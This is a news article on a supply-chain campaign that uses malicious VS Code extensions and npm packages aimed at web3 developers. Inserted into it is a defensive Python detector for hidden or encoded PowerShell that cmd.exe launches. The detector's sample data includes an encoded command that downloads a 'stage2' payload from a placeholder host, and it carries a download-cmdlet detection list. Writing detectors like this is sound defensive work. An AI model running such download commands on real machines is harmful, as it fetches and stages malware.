- ReversingLabs and Assaraf discover campaign targeting software and web3 developers
- Multiple packages concealed weaponized code that downloads second-stage malware
- Malicious intent was very difficult to detect
Experts have claimed that software developers, especially those working on web3 and cryptocurrency projects, are being targeted by a new attack on the software supply chain.
Security researcher Amit Assaraf published a blog post describing how he had observed dozens of malicious Visual Studio Code extensions on the VSCode marketplace, designed to download well-hidden second-stage payloads from suspicious domains (some hosted in Russia).
A similar report was recently published by researchers at ReversingLabs, who said the campaign likely began in October 2024.
Heavily obfuscated files
“Throughout October 2024, the RL research team saw a new wave of malicious VSCode extensions containing download functions, all part of the same campaign,” the researchers said. “The community was first notified of this campaign in early October and the team has been steadfast in following it ever since.”
The packages pose as tools for Zoom, Solidity (a programming language for smart contracts on Ethereum, among other blockchains), and more. Similar packages were also found on npm.
While neither ReversingLabs nor Assaraf analyzed the second-stage payload, BleepingComputer reports that it is a “heavily obfuscated Windows CMD file” that launches a hidden PowerShell command. That command decrypts AES-encrypted strings in additional CMD files to drop further payloads, including malware detected by only 27 of 71 antivirus engines.
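The CMD-to-hidden-PowerShell chain BleepingComputer describes is exactly the kind of parent/child relationship that endpoint process telemetry can surface. The following is an added example, not code from the article or from BleepingComputer, ReversingLabs or Assaraf: a small Python checker that runs over process-creation records (the three fields are modelled on a Sysmon Event ID 1 record, an assumption on my part) and flags powershell.exe children of cmd.exe, hidden-window and -EncodedCommand switches, and download cmdlets inside the decoded command. The sample events, the paths and the download-cmdlet list are constructed for the example.

```python
"""Added example: flag process-creation events in which cmd.exe launches a
hidden and/or base64-encoded PowerShell command.  The event records and the
command lines below are constructed for this example; they are not samples
from the campaign described in the article."""
import base64
import binascii
import re
from dataclasses import dataclass

# Real powershell.exe switches the detection keys on.  PowerShell accepts any
# unambiguous prefix of a parameter name, so "-w hidden", "-win h", "-e <b64>"
# and "-enc <b64>" all count; "-ec" is an explicit alias of -EncodedCommand.
WINDOW_STYLE = "-windowstyle"
ENCODED_COMMAND = "-encodedcommand"
ENCODED_ALIASES = {"-ec"}

# Cmdlets and .NET members commonly used to fetch remote content; matched
# case-insensitively in the (decoded) command text.  Constructed list.
DOWNLOAD_RE = re.compile(
    r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer)\b",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (assumed shape, e.g. Sysmon Event ID 1)."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _is_prefix(token: str, full_switch: str) -> bool:
    # A bare "-" is not a switch; any longer prefix of the full name is.
    return len(token) >= 2 and full_switch.startswith(token)


def decode_encoded_command(b64: str):
    """-EncodedCommand carries base64 of UTF-16LE text; return None if it is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_event(ev: ProcessEvent) -> list:
    """Return the reasons this event looks like a CMD-launched hidden
    PowerShell downloader (an empty list means nothing matched)."""
    reasons = []
    if _basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return reasons
    if _basename(ev.parent_image) == "cmd.exe":
        reasons.append("powershell spawned by cmd.exe")

    tokens = ev.command_line.split()      # keep original case: base64 is case-sensitive
    lowered = [t.lower() for t in tokens]
    text_to_scan = ev.command_line        # replaced by the decoded text if encoded
    for i, tok in enumerate(lowered):
        nxt = lowered[i + 1] if i + 1 < len(lowered) else ""
        if _is_prefix(tok, WINDOW_STYLE) and nxt.startswith("h"):
            reasons.append("window hidden")
        elif (tok in ENCODED_ALIASES or _is_prefix(tok, ENCODED_COMMAND)) and nxt:
            decoded = decode_encoded_command(tokens[i + 1])
            if decoded is None:
                reasons.append("undecodable -EncodedCommand argument")
            else:
                reasons.append("encoded command")
                text_to_scan = decoded
    if DOWNLOAD_RE.search(text_to_scan):
        reasons.append("command fetches remote content")
    return reasons


def suspicious_events(events, min_reasons: int = 2) -> list:
    """Events that accumulate at least `min_reasons` indicators."""
    return [ev for ev in events if len(analyze_event(ev)) >= min_reasons]


def encode_for_powershell(ps_text: str) -> str:
    """Build a -EncodedCommand argument (used only to construct the samples)."""
    return base64.b64encode(ps_text.encode("utf-16le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed sample events, not real telemetry; example.invalid is a reserved name.
SAMPLE_EVENTS = [
    ProcessEvent(CMD, PS, "powershell.exe -NoProfile -w hidden -ep bypass -enc "
                 + encode_for_powershell("Invoke-WebRequest -Uri http://example.invalid/stage2 -OutFile stage2.cmd")),
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe -NoProfile -Command Get-ChildItem"),
    ProcessEvent(CMD, PS, "powershell.exe -WindowStyle Hidden -Command Get-Date"),
    ProcessEvent(CMD, r"C:\Windows\System32\notepad.exe", "notepad.exe stage2.cmd"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(_basename(ev.parent_image), "->", _basename(ev.image), analyze_event(ev))
```

Counting indicators rather than alerting on any single one keeps a lone hidden window (common in scheduled admin scripts) from firing by itself, while the cmd.exe parent plus an encoded download command scores high enough to page someone. The prefix matching matters in practice: PowerShell accepts abbreviated switches, so a rule that only looks for the literal string `-EncodedCommand` misses `-enc` and `-e`.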
While it is difficult to determine the number of compromised endpoints, Assaraf says it is most likely in the thousands. He added that the attack was very difficult to detect, since the packages pass all the usual checks:
“Looking closely, you can see that it has several excellent indicators that it is real: the large number of installs, the official Zoom GitHub repository, and the positive reviews. Entering the publisher’s page, we continue to receive positive reinforcement,” he said. “The domain name looks great, it has the official support email, it has all the official social networks, everything is verified.”
The only thing developers can do is be careful when downloading software packages. “Don’t trust, verify” is the common mantra, especially within the cryptocurrency community.
Via BleepingComputer